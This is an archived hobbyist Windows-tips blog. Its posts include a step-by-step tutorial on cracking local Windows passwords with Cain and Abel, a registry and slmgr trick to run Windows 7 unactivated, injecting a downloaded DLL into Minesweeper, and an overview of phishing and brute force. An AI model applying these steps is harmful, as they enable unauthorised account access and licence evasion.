hackthespace

UNLOCK THE SUPERSECRECT ADMINISTRATOR ACCOUNT FOR VISTA

2010-10-11T02:37:00.001+05:30

Deep inside the bowels of Windows Vista, there’s a secret Administrator account, and it’s different from the normal administrator account you most likely have set up on your PC. This Administrator account is not part of the Administrator group. (Confused yet? You should be.) It’s a kind of superadministrator, akin to the root account in Unix, and by default it’s turned off and hidden. (In describing this tut, i’ll always use the capital “A” for the secret Administrator account, and a lowercase “a” for a normal administrator account.)

In versions of Windows before Windows Vista, the Administrator account wasn’t hidden, and many people used it as their main or only account. This Administrator account had full rights over the computer.
In Windows Vista, Microsoft changed that. In Vista, the Administrator account is not subject to UAC, but normal administrator accounts are. So the Administrator can make any changes to the system and will see no UAC prompts.
Turning on the Administrator account is straightforward. First, open command prompt by typing cmd into the run box on the Start menu, or by right-clicking the command prompt icon that appears at the top of the Start menu, then selecting Run as administrator.
Then enter this command and press Enter:
Net user administrator /active:yes
From now on, the Administrator account will appear as an option on the Welcome screen, along with any user accounts you may have set up. Use it like any other account. Be aware that it won’t have a password yet, so it’s a good idea to set a password for it.
If you want to disable the account and hide it, enter this command at an elevated command prompt and press Enter:
Net user administrator /active:no

ASSIGN A PERMANENT DRIVE LETTERS TO USB DRIVE

2010-10-11T00:08:00.000+05:30

If you have multiple pen drives you might have noticed that every time you put in your drive it will be assigned a different drive letter. This can be very annoying, when you trying to open files of pendrive from some software as recent drive letter is changed you have to change address again. So now here is one solution for this problem assign permanent letter to your USB pendrive. Its very simple just follow given steps:

1]- Go to Start and then Run.

2]- Type Compmgmt.msc and hit Enter. Computer Management console will open up.

3]- In the menu on the left select Disk Management under the storage tab. You will now see all of your drives/partitions in the right hand side panel.

4]- Right click the USB drive you want to assign a permanent letter to and select Change Drive Letter and Paths.

5]- Click on Change.

6]- Assign any drive letter you want and click OK

7]- It will give a warning-you can ignore it since there are hardly any programs that depend on USB drive letters. But at the end of the day its your call, whether to go for it or not.

8]- The final step is to select File > Save and save the file in the default directory. Close the Console and you are done.

GTALK AS A FM RECEIVER AND VOIP PHONE

2010-10-11T00:06:00.000+05:30

What is Gtalk 2 Voip ?
GTalk2VoIP is a free and publicly open voice gateway
for major Instant Messenger clients. It makes possible voice
interoperability between Google Talk, MSN/Live Messenger, Yahoo!
Messenger and SIP phones without any additional software installation.
How can I hear FM in Gtalk?
Teen Taal 110 a hindi Fm station which aims at delivering new hindi songs can now be heard right away from your google talk.
All you have to do is to follow the steps below:

* Open your Google talk and Sign in
* After Signing In, click the add button and add this id service@gtalk2voip.com
* After adding, add the second Id 110@radio.gtalk2voip.com
* After completion of the steps above, make a call to the second id i.e call to 110@radio.gtalk2voip.com
* Now you will directly be connected to Teen Taal Fm Station. (voice quality is average)
The first step of adding id would make you register the gtalk2voip service!
Other features of Gtalk2Voip:
* Make calls from Google Talk, Yahoo or MSN to any mobile or landline phone (PSTN)
* Make calls to other Google Talk, Yahoo! and MSN/Live Messenger users or SIP phones (SIP URI)
* Create voice conferences with other Google Talk, Yahoo! or MSN/Live Messenger users
* Send or receive voicemail from/to Google Talk, Yahoo! or MSN/Live Messenger users
* Receive calls to your Google Talk, Yahoo! or MSN/Live Messenger
from mobile or landline phones (PSTN) by using DIDs or via SIP Broker
service
* Receive calls from SIP phones, including Gizmo Project, InPhonex, SJPhone and others
* Send SIP/SIMPLE instant messages to SIP phones
How it works?
Some of the services I mentioned above may be chargeable while they
offer free incoming calls from sip phones to your gtalk, incoming call
from PSTN to your gtalk, making calls to other IMs etc.
So now you get a free incoming SIP number, PSTN access number for Gtalk etc which you can add on to build your business widely.
Gtalk 2 voip also provides support for mobile platform with their specially designed application called Talkonaut which helps them to access and enjoy their voip services from their handheld.

VLC PLAYER AND ITS POWER

2010-10-05T16:19:00.000+05:30

For most people, VLC is the favorite media player because it plays everything they throw at it without hiccups. No hunting for codec. But VLC can do a lot of other things as well. Find out how many of these listed below you knew, and how many you did not.

1]- Rip DVDs: VLC includes a basic DVD ripper. You probably would never use it when there are better DVD rippers available, but it helps to know that you can in fact, get a decent quality DVD rip with VLC. To rip a movie follow these steps: Go to the Media menu and choose Convert/Save. Click on the Disc tab.

* Here you can adjust the Starting Position and rip only specific titles or chapters.
* Enter file name making sure to end with .MPG, and start ripping.
* Click Save.

2]- Record videos: With the new VLC, you can record videos during playback. The record button is hidden by default. To see it, click on View>Advanced Control. The record button will now appear. Clicking on the button while playing a movie or video will start recording. Clicking again will stop recording.

3]- Play RAR files: Do you know VLC can play videos zipped inside RAR files? They play like normal video files and you can even use the seek bar. If the RAR file is split into several files, no problem. Just load the first part (.part001.rar ) and it will automatically take the rest of the parts and play the whole file.

4]- Play in ASCII mode: VLC media player has an amusing ability, to playback movies in ASCII art. To enable ASCII mode, open VLC media player and click on Tools>Preferences. Open the section “Video” section and under “Output” select “Color ASCII art video output” from the drop down menu. Save it. Now play any video file to enjoy the ASCII art.

5]- Listen to online radio: VLC includes hundreds of Shoutcast radio stations. You just need to enable it through Media>Services Discovery>Shoutcast radio listings. Now, open the Playlist and browse through the stations.

6]- Convert Audio and Video formats: In VLC you can convert video and audio files from one format to another. Several different formats are supported like MP4, WMV, AVI, OGG, MP3 etc. To access the converter:

* Go to Media>Convert/Save.
* Load the file you want to convert using the Add button and click Convert.
* Now choose the output format and output file location.

7]- Download YouTube and other online videos: First grab the URL of the YouTube video page. Now click on Media>Open Network stream. Paste the URL and click Play.
Once VLC starts streaming the video, click Tools>Codec Information and at the bottom of the window you will see a Location box. Copy the URL and paste it on your browser’s address bar. The browser will now download the file which you can save it to your hard disk. Alternatively, you can record the video.

MAKE AN UNDELETEABLE FOLDER IN WINDOWS

2010-10-05T11:19:00.000+05:30

It often happens that some of your folders contain very important data and you delete those folders by mistake. So why not make such folders UNDELETEABLE & avoid such mistakes..! [Works with Windows XP|Vista|Seven]

1]- Open CMD ( Type in Run option, the command ‘cmd’ or navigate to All Programs->Accessories-> Command Prompt)

2]- Change the directory to where you want to create the folder.Type ‘cd..’ to exit the current directory. As an example i will be creating the folder in C:, so i will use the ‘cd..’ command twice to navigate to C:

3]- Type md\lpt1\\ and press enter, the folder now will be in your C:

4]- If you try to delete it, it wont delete. This works on all version of windows.

5]- If you want to delete it just go to ‘CMD’, navigate to the directory and type
rd\lpt1\\ and press Enter.

GOD FOLDER IN WINDOWS 7

2010-10-05T11:14:00.000+05:30

What is GOD Mode Folder?

It’s a folder packed with shortcuts to just about every settings change and administrative function in Windows 7. Everything you’ll find in the Action Center, Backup and Restore, Autorun, Desktop Gadgets, Devices and Printers — it’s all there. All dumped in one central location for easy access. Learn how to do it:

1]- Create a New Folder anywhere in the drive your Windows is installed(You can create a new folder in My Documents or Desktop..anywhere its your wish).

2]- After creating the New Folder, right click on it and rename it to-
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

3]- You are done, you now have the GODMODE Folder with you. Enjoy all your powers!!

PS- It works with all versions of Windows 7, Works with Vista 32 bit as well, though I have heard that Vista 64 bit crashes on attempting this. So 64 Bitters with Vista Beware!

WHAT IS A CAPTCHA AND HOW IT WORKS?

2010-10-05T11:06:00.000+05:30

CAPTCHA or Captcha (pronounced as cap-ch-uh) which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart” is a type of challenge-response test to ensure that the response is only generated by humans and not by a computer. In simple words, CAPTCHA is the word verification test that you will come across the end of a sign-up form while signing up for Gmail or Yahoo account. The following image shows the typical samples of CAPTCHA.

Almost every Internet user will have an experience of CAPTCHA in their daily Internet usage, but only a few are aware of what it is and why they are used. So in this post you will find a detailed information on how CAPTCHA works and why they are used.

What Purpose does CAPTCHA Exactly Serve?

CAPTCPA is mainly used to prevent automated software (bots) from performing actions on behalf of actual humans. For example while signing up for a new email account, you will come across a CAPTCHA at the end of the sign-up form so as to ensure that the form is filled out only by a legitimate human and not by any of the automated software or a computer bot. The main goal of CAPTCHA is to put forth a test which is simple and straight forward for any human to answer but for a computer, it is almost impossible to solve.

What is the Need to Create a Test that Can Tell Computers and Humans Apart?

For many the CAPTCHA may seem to be silly and annoying, but in fact it has the ability to protect systems from malicious attacks where people try to game the system. Attackers can make use of automated softwares to generate a huge quantity of requests thereby causing a high load on the target server which would degrade the quality of service of a given system, whether due to abuse or resource expenditure. This can affect millions of legitimate users and their requests. CAPTCHAs can be deployed to protect systems that are vulnerable to email spam, such as the services from Gmail, Yahoo and Hotmail.

Who Uses CAPTCHA?

CAPTCHAs are mainly used by websites that offer services like online polls and registration forms. For example, Web-based email services like Gmail, Yahoo and Hotmail offer free email accounts for their users. However upon each sign-up process, CAPTCHAs are used to prevent spammers from using a bot to generate hundreds of spam mail accounts.

Designing a CAPTCHA System

CAPTCHAs are designed on the fact that computers lack the ability that human beings have when it comes to processing visual data. It is more easily possible for humans to look at an image and pick out the patterns than a computer. This is because computers lack the real intelligence that humans have by default. CAPTCHAs are implemented by presenting users with an image which contains distorted or randomly stretched characters which only humans should be able to identify. Sometimes characters are striked out or presented with a noisy background to make it even more harder for computers to figure out the patterns.
Most, but not all, CAPTCHAs rely on a visual test. Some Websites implement a totally different CAPTCHA system to tell humans and computers apart. For example, a user is presented with 4 images in which 3 contains picture of animals and one contain a flower. The user is asked to select only those images which contain animals in them. This Turing test can easily be solved by any human, but almost impossible for a computer.

Breaking the CAPTCHA

The challenge in breaking the CAPTCHA lies in real hard task of teaching a computer how to process information in a way similar to how humans think. Algorithms with artificial intelligence (AI) will have to be designed in order to make the computer think like humans when it comes to recognizing the patterns in images. However there is no universal algorithm that could pass through and break any CAPTCHA system and hence each CAPTCHA algorithm must have to be tackled individually. It might not work 100 percent of the time, but it can work often enough to be worthwhile to spammers.

HOW TO USE WINDOWS 7 WITHOUT ACTIVATION

2010-10-04T02:40:00.000+05:30

Most of you might be aware of the fact that it is possible to use Windows 7 and Vista for 120 days without activation. This is actually possible using the slmgr -rearm command which will extend the grace period from 30 days to 120 days. However in this post I will show you a small trick using which it is possible to use Windows 7 without activation for approximately an year! Here is a way to do that.

1. Goto “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt” and select “Run as Administrator“. If you are not the administrator then you are prompted to enter the password, or else you can proceed to step-2.

2. Now type the following command and hit enter slmgr -rearm

3. You will be prompted to restart the computer. Once restarted the trial period will be once again reset to 30 days. You can use the above command for up to 3 times by which you can extend the trial period to 120 days without activation.
4. Now comes the actual trick by which you can extend the trial period for another 240 days. Open Registry Editor (type regedit in “Run” and hit Enter) and navigate to the following location

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform

5. In right-side pane, change value of SkipRearm to 1. 6. Now you will be able to use the slmgr -rearm command for another 8 times so that you can skip activation process for another 240 days. So you will get 120 + 240 = 360 days of free Windows 7 usage.

120 days using “slmgr -rearm” command before registry edit +
240 days using “slmgr -rearm” command after registry edit
= 360 Days

HOW WINDOWS PRODUCT ACTIVATION (WAP) WORKS

2010-10-04T02:35:00.000+05:30

Windows Product Activation or WPA is a license validation procedure introduced by Microsoft Corporation in all versions of it’s Windows operating system. WPA was first introduced in Windows XP and continues to exist in Windows Server 2003, Windows Vista, Windows Server 2008 and Windows 7 as well. WPA enforces each end user to activate their copy of Windows so as to prevent unauthorized usage beyond the specific period of time until it is verified as genuine by Microsoft. How WPA really works was a closely guarded secret until GmbH analyzed WPA using a copy of Windows XP RC1 and published a paper on their findings.In this post you will find answers to some of the most frequently asked questions about Windows Product Activation.

Why activation?

Microsoft’s intention behind the activation is to limit the usage of it’s Windows operating system to only one machine for which the retail license is issued. Any other computer which runs on the same license must be disallowed from using the software. Thus WPA demands for activation of the product within 30 days of it’s installation so as to ensure that it is genuine.

What does “Genuine Windows” means?

The copy of Windows is said to be genuine only if the product key used during the installation is genuine. It means that a given product key (retail license) must be used to install Windows only on one computer for which the license was purchased. Thus if the same key is used for the installation on another computer, then it is said to be a pirated copy.

Exactly what information is transmitted during the activation?

When you activate your copy of Windows you are transmitting an Installation ID code to the Microsoft either by phone or Internet depending on the method you choose to activate. Based on this, the Microsoft’s licensing system can determine whether or not the installed OS is genuine. If it is said to be genuine, then the system will receive the Activation ID which completes the activation process. If the activation is done via telephone then the Activation ID needs to be entered manually to complete the activation process.

What information does the Installation ID contain?

This Installation ID is a 50-digit number which is derived from the following two data.
1. Product ID – It is actually derived from the 25-digit product key (the alphanumeric value that is printed on the sticker over the Windows CD/DVD case) that is entered during the installation of the operating system. The Product ID is used to uniquely identify your copy of Windows.
2. Hardware ID – This value is derived based on the hardware configuration of your computer.
The WPA system checks the following 10 categories of the computer hardware to derive the Hardware ID:

Display Adapter
SCSI Adapter
IDE Adapter (effectively the motherboard)
Network Adapter (NIC) and its MAC Address
RAM Amount Range (i.e., 0-64mb, 64-128mb, etc.)
Processor Type
Processor Serial Number
Hard Drive Device
Hard Drive Volume Serial Number (VSN)
CD-ROM / CD-RW / DVD-ROM

Thus the Installation ID which is a combination of Product ID and Hardware ID is finally derived and sent to Microsoft during the activation process.

How is the Installation ID validated?

The Installation ID needs to be validated to confirm the authenticity of the installed copy of Windows. So after the Installation ID is received by Microsoft, it is decoded back so as to obtain the actual product key and the hardware details of the computer involved in the activation process.
The Microsoft’s system will now look to see if this is the first time the product key is being used for the activation. This happens when the user is trying to activate his Windows for the first time after purchase. If this is the case then the Installation ID is validated and the corresponding Activation ID is issued which completes the activation process.
However Microsoft system will now associate this product key with the hardware ID of the computer and stores this information on their servers. In simple words, during the first use of the product key, it is paired together with the Hardware ID and this information is stored up on the Microsoft servers.

What if a computer running a pirated copy of Windows attempts to activate?

The activation fails whenever the copy of Windows installed is not said to be genuine. This usually happens when the product key used for the installation is said to have been used earlier on a different computer. This is determined during the activation process as follows:
During the validation of the Installation ID, the Microsoft’s system checks to see if the same product key was used in any of the previous activation processes. If yes then it looks to see the Hardware ID associated with it. The computer running a pirated copy of Windows will obviously have a different hardware configuration and hence the Hardware ID will mismatch. In this case the activation process will fail.
Thus for a successful activation, either of the following two cases must be satisfied:

The product key must have been used for the first time. ie: The product key should not have been used for earlier activations on any other computer.
If the product key is said to have been used earlier, then the Hardware ID should match. This happens only if the same computer for which the license was genuinely purchased is attempting for subsequent activation.

What about formatting the hard disk?

Each time the hard disk is reformatted and Windows is re-installed, it needs to be re-activated. However the activation process will be completed smoothly since the same computer is attempting for subsequent activation. In this case both the product key and the Hardware ID will match and hence the activation becomes successful.

What is I upgrade or make changes to my hardware?

In the above mentioned 10 categories of hardware, at least 7 should be the same. Thus you are allowed to make changes to not more than 3 categories of hardware. If you make too many changes then your activation will fail. In this case, it is necessary to contact the customer service representative via phone and explain about your problem. If he is convinced he may re-issue a new product key for your computer using which you can re-activate your Windows.

Some things WPA does not do

WPA does not send any personal information at all about you to Microsoft. There is still an option to register the product with Microsoft, but that is separate and entirely voluntary.
If you prefer to activate via phone, you are not required to give any personal information to Microsoft.
WPA does not provide a means for Microsoft to turn off your machine or damage your data/hardware. (Nor do they even have access to your data). This is a common myth that many people have about Microsoft products.
WPA is not a “lease” system requiring more payments after two years or any other period. You may use the product as licensed in perpetuity.

I have tried my best to uncover the secret behind the WPA. For further details and more technical information you can read the actual paper by Fully Licensed GmbH at http://www.licenturion.com/xp/fully-licensed-wpa.txt.

THINGS THAT FIREFOX CAN DO FOR YOU.

2010-04-13T04:48:00.000+05:30

There are hundreds of things that Firefox can do. Extensions can enhance your Firefox, but browsing through hundreds of extensions can be time consuming and some of them are useless.

What are the most popular and most functional Firefox extenstions ?

Block ads on webpages : Adblock Plus
Use mouse gestures (powersurfing) : All-in-One Gestures
Download manager in a statusbar : Download Statusbar
Customize Google pages; remove ads : CustomizeGoogle
Discover interesting sites being recommended by others : StumbleUpon
Manage tabs (multiple links/duplicate/close etc ) : Tab Mix Plus
Look up any word in dictionary : Answers
Translate pages : Translator
Download videos : Video DownloadHelper
Block Flash ads or content : Flashblock
Blog about the current page : Performancing for Firefox
Clear the cache with one click on the toolbar : Clear Cache Button
Surf the web without leaving a trace in my computer : Stealther
View an Internet-Explorer-only webpage in Firefox : IE Tab
See weather information : ForecastFox
Download/upload files using ftp : FireFTP
Speed up Firefox : Fasterfox
Blog to Blogger service : BlogThis
Synchronize Firefox bookmarks on different computers : Bookmarks Synchronizer
Bypass mandatory registration of username and password for sites : BugMeNot
Be notified when new mail arrives at Gmail account : Gmail Notifier
See thumbnails of pages in session history : Reveal
Store and sync bookmarks online : Chipmark
Chat on the Internet Relay Chat (IRC) : ChatZilla
Minimize Firefox to system tray : MinimizeToTray
Use Gmail for space : Gmail Space
Add/remove/change some features for sites : GreaseMonkey
Block phishing sites : NetcraftToolbar
Control iTunes using Firefox : FoxyTunes
Use a sidebar to control multiple functions : All-in-One Sidebar
Open PDF files in a new tab : PDF Download
Save all the images/media on a page : Magpie
Zoom in/out on an image : Image Zoom
Search the bookmarks : Locate in Bookmark Folders
Manage user styles for sites : Stylish
Edit bookmarks easily : Flat Bookmark Editing
Download/open all/selected links on a page : Linky
Add a powerful multi-functional preference bar : PrefBar
Add more search engines to Firefox search box : Mycroft
Create a tiny url : TinyUrl Creator
Track time spent browsing / on a project : TimeTracker
Add RSS feeds to web-based/desktop readers or reader extensions : LiveLines
Search up to 25 custom chosen sites : Roll your Own Search for Firefox
See Alexa information, search engine backlinks for a page : SearchStatus
Fill web forms with name/address/email etc : Autofill
See all tabs in one window : Viamatic foXpose
Automatically copy the selected text to clipboard : AutoCopy
Change user agent for certain sites : User Agent Switcher
Find the meaning of selected word in a dictionary : DictionarySearch
Create new different passwords for different sites : PasswordMaker

PASSWORD HACKING

2009-12-09T10:11:00.000+05:30

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.

Most passwords can be cracked by using following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.

If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.

One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.

LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered difficult to invert when used correctly.

2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information. Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)

* the word "password", "passcode", "admin" and their derivatives

* the user's name or login name

* the name of their significant other or another person (loved one)

* their birthplace or date of birth

* a pet's name

* a dictionary word in any language

* automobile licence plate number

* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)

* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.

and so on....

In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.

A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password difficult to guessed.

3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.

Always disable or change the applications' (both online and offline) default username-password pairs.

4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.

Long is the password, large is the time taken to brute force it.

5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.

Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.

Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.

However, cracking usually designates a guessing attack.

REAL TIME SEARCH

2009-12-09T03:42:00.000+05:30

Google just revealed real-time search.

If you’re wondering how to enable it, well… Real time search will be available for everyone in a few days. If it’s still not active for you, just do the following:

Go to www.google.com
Search for something
Edit the URL so it contains: &esrch=RTSearch&tbs=rltm%3A1. For example, if the URL you’re getting is something like:

http://www.google.com/search?q=apple

Just change it to:

http://www.google.com/search?q=apple&esrch=RTSearch&tbs=rltm%3A1

As you can easily notice, the trick is just to set a couple of GET parameters. If you use Firefox, you can add these parameters automatically for every search. Just:

Open Firefox
Go to: Bookmarks -> Organise Bookmarks…
Double click on Bookmarks Menu
Organise -> New Bookmark…
Name: Google
Location: http://www.google.com/search?q=%s&esrch=RTSearch&tbs=rltm%3A1
Keyword: g

That’s it. Now simply go to your Firefox main window and simply type:

g apple

as the URL, where apple is what you’re searching for.
Enjoy!

WINDOWS XP PASSWORD CRACKING

2009-12-08T17:23:00.004+05:30

Here we use the tool "Cain and Abel" for cracking passwords of any local user/administrator.
First download cain and abel from "http://www.oxid.it/cain.html" and install it on your system.

Make sure that you have disabled the antivirus/firewall running on your system before installing and throughout this process.

Two most effective techniques used here are "Brute-Force" and "Cryptanalysis".

Brute-Force:- As this techniques takes more time to complete, the attacker prefer this technique only when there is a hope that the password contain same type of characters or may be two. i.e only loweralpha, only alpha, only numeric or may be loweralpha-numeric, also it should contain less than 7 characters. Otherwise it takes more time to crack password, which may be the mixture of all types of characters along with special symbols.
The step-by-step explaination for this technique is given below-

1) Open the tool "Cain and Abel"

2) Go into the category "Cracker" it displays all sub-categories under "Cracker" in left panel.

3) Select "LM & NTLM Hashes" from left panel and then click on symbol, you will be greeted by a window as shown.

4) Check "import hashes from local system" and then click "Next". This shows all the active accounts on local system like administrator, guest, etc. along with LM and NT hashed values of their respective passwords, as shown below.

5) Right clicking on any username shows all available options using which we can crack it's password.

6) Here we select "Brute-Force Attack" and then "NTLM Hashes", since windows uses NTLM hashes to store local users' passwords.

7) You will be greeted by a window where you can modify properties for brute-force attack such as password length, character set, etc.

8) Click on "Start" button.

9) On completion it will reveal the exact password.

Cryptanalisys :- Basically, Cryptanalisys means Operations performed in converting encrypted messages to plain text without initial knowledge of the crypto-algorithm and/or key employed in the encryption.
This is the fastest technique of password cracking possible due to "Rainbow Tables".
A rainbow table is a file that is used to lookup an unknown plaintext from a known hash for an algorithm that does not usually permit this operation.
Steps 1 to 4 i.e upto importing hashes from local system, are similar to previous technique (i.e brute-force). The steps coming after that are as follows-

5) Here, select "cryptanalisys attack" then "NTLM hashes" and then select "via rainbow tables". Here we can choose either OphCrack or RainbowCrack formats of tables. The rainbow tables are available free to download on internet.
Due to large file size of rainbow tables (350MB - 3GB); instead of downloading we can also create at own just by downloading rainbow table generator (winrtgen.zip of 181KB) free download at "http://www.oxid.it/downloads/winrtgen.zip"

6) Click on "Add Table"

7) Browse for the location of rainbow table on your system, select proper table and click "open".

8) Select the loaded table and then click on "Start" button.

9) On completetion it will show the
exact password.

To learn windows password cracking techniques properly, one must understand "LM" & "NTLM" algorithms, SAM File, Dumping NTLM hashes from local SAM, Rainbow Tables, etc.......!

INTRUSION DETECTION SYSTEM (IDS)

2009-12-08T16:07:00.000+05:30

An intrusion detection system (IDS) is software and/or hardware based system that monitors network traffic and monitors for suspicious activity and alerts the system or network administrator. In some cases the IDS may also respond to anomalous or malicious traffic by taking action such as blocking the user or source IP address from accessing the network.

Typical locations for an intrusion detection system is as shown in the following figure -

Following are the types of intrusion detection systems :-

1) Host-Based Intrusion Detection System (HIDS) :- Host-based intrusion detection systems or HIDS are installed as agents on a host. These intrusion detection systems can look into system and application log files to detect any intruder activity.

2) Network-Based Intrusion Detection System (NIDS) :- These IDSs detect attacks by capturing and analyzing network packets. Listening on a network segment or switch, one network-based IDS can monitor the network traffic affecting multiple hosts that are connected to the network segment, thereby protecting those hosts. Network-based IDSs often consist of a set of single-purpose sensors or hosts placed at various points in a network. These units monitor network traffic, performing local analysis of that traffic and reporting attacks to a central management console.

Some important topics comes under intrusion detection are as follows :-

1) Signatures - Signature is the pattern that you look for inside a data packet. A signature is used to detect one or multiple types of attacks. For example, the presence of “scripts/iisadmin” in a packet going to your web server may indicate an intruder activity. Signatures may be present in different parts of a data packet depending upon the nature of the attack.

2) Alerts - Alerts are any sort of user notification of an intruder activity. When an IDS detects an intruder, it has to inform security administrator about this using alerts. Alerts may be in the form of pop-up windows, logging to a console, sending e-mail and so on. Alerts are also stored in log files or databases where they can be viewed later on by security experts.

3) Logs - The log messages are usually saved in file.Log messages can be saved either in text or binary format.

4) False Alarms - False alarms are alerts generated due to an indication that is not an intruder activity. For example, misconfigured internal hosts may sometimes broadcast messages that trigger a rule resulting in generation of a false alert. Some routers, like Linksys home routers, generate lots of UPnP related alerts. To avoid false alarms, you have to modify and tune different default rules. In some cases you may need to disable some of the rules to avoid false alarms.

5) Sensor - The machine on which an intrusion detection system is running is also called the sensor in the literature because it is used to “sense” the network.

Snort :- Snort is a very flexible network intrusion detection system that has a large set of pre-configured rules. Snort also allows you to write your own rule set. There are several mailing lists on the internet where people share new snort rules that can counter the latest attacks.

Snort is a modern security application that can perform the following three functions :

* It can serve as a packet sniffer.
* It can work as a packet logger.
* It can work as a Network-Based Intrusion Detection System (NIDS).

Further details and downloads can be obtained from it's home- http://www.snort.org

HIDE ENTIRE DRIVES PARTITON WITHOUT REGISTRY

2009-12-08T14:59:00.001+05:30

Here is a cool technique which hides entire hard disk drives by a simple procedure.
This is the best security tip to be employ against unauthorised users.

1) Go to Start > Run > type "diskpart".
A DOS window will appear with following description.

DISKPART>

2) Then type "list volume"
The result will look something like one as shown below-

3) Suppose you want to hide drive E then type "select volume 3"
Then a message will appear in same window { Volume 3 is the selected volume}

4) Now type "remove letter E"
Now a message will come { Diskpart Removed the Drive letter }

sometime it requires to reboot the computer.
Diskpart will remove the letter.

Windows XP is not having capabilty to identify the unknown volume.
Your Data is now safe from unauthorised users.

To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" by "assign".
It means type "assign letter E".

HACKING MINESWEEPER BY DLL INJECTION

2009-12-08T14:16:00.000+05:30

You can hack Microsoft Minesweeper by DLL Injection Technique.
Dynamic DLL Injection is nothing but the injection that occurs after the program is executed. This technique is used by trojans & virus. When an attacker attempts to load code in process memory, then he is using Dynamic Injection.
It is working in Windows XP Service Pack 2.

Tools Required:
1) Hack.dll [Download]
2) Advance Process Manipulation [Download]

Steps to Hack Minesweeper:

Start Minesweeper (Start->All Programs->Games->Minesweeper)
Start APM (Advance Process Manipulation)
Select "c:\windows\system32\winmine.exe"
Right click on the module window in the lower half
Then select "Load DLL" and select the Hack.dll, from where you have saved it in your computer.
If you have done every thing right, you will get this window "Dll Injection, Sucessfull" Click OK there.
After that you will get a window "Success, C:\Hack.dll has been loaded". Click OK.
Now, start playing Minesweeper.
Now you can close Advance Process Manipulation Software otherwise you can continue also.
Wow you have hacked minesweeper sucessfully. You will notice the timer has stopped after 01 seconds. Take as much time you need to complete the game.

After finishing your game . Select Hack.dll from the modules window and unload it. Otherwise close Advance Process Manipulation Software.

CLICKJACKING

2009-12-07T07:44:00.002+05:30

Definition :-
"Clickjacking is a malicious technique of tricking web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages." - Wikipedia

Introduction :-
A vulnerability across a variety of browsers and platforms, a clickjacking takes the form of embedded code or script that can execute without the user's knowledge, such as clicking on a button that appears to perform another function.
The long list of vulnerabilities involves browsers, Web sites and plug-ins like Flash.

How It Works? :-
ClickJacking is a little bit difficult to explain however try to imagine any button that you see in your browser from the Wire Transfer Button on your Bank, Post Blog button on your blog, Add user button on your web-site, Google Gadgets etc.
ClickJacking gives the attacker to ability to invisibly float these buttons on-top of other innocent looking objects in your browser.
So when you try to click on the innocent object, you are actually clicking on the malicious button that is floating on top invisibly.

In other words, the attack is thrown by a malicious web page embedding objects, possibly from a different site, such as framed documents or plugin content (Flash, Silverlight, Java…) which may lead to unwanted results if clicked by the current user (e.g. a “Delete all messages” button in your webmail or an advertisement banner in a click fraud scheme). Using DHTML, and especially CSS, the attacker can disguise or hide the click target in several ways which go completely undetected by the user, who’s easily tricked into clicking it in a more or less blind way.

JavaScript increases the effectiveness of these attacks hugely, because it can make our invisible target constantly follow the mouse pointer, intercepting user’s first click with no failure.
We can however imagine a few less effective but still feasible scriptless scenarios, e.g. covering the whole window with hidden duplicates of the target or overlaying an attractive element of the page, likely to be clicked (e.g. a game or a porn image link), with a transparent target instance.

Examples :-
1) Malicious camera spying using Adobe's Flash.
2) Flash, Java, SilverLight, DHTML Game or Application used to Spy on your Webcam and/or Microphone.

The best defense against ClickJacking attacks is to use Firefox with the NoScript add-on installed.

NoScript 1.8.9.2
Allow active content to run only from sites you trust,
and protect yourself against XSS and Clickjacking attacks...!

HIDE YOUR HDD PARTITIONS

2009-09-05T00:02:00.000+05:30

Hide your HDD partitions
1. Go to Start ,go to run type “diskpart”.
a dos window will appear with following like that
DISKPART

2. Then type “list volume” without quote
It will look like this.

Volume### Ltr Label Fs Type Size Status Info
————– —- —— — —– —- ——- —–

Volume 0 F CD-ROM
Volume 1 C NTFS Partition 7000MB Healthy
Volume 2 D soft NTFS Partition 8000MB Healthy
Volume 3 E ---- NTFS Partition 8000MB Healthy

3. If u want to hide drive E then type “select volume 3″ without quote

then a message will appear in same winwods { Volume 3 is the selected volume}

4.now type ” remove letter E” without quote
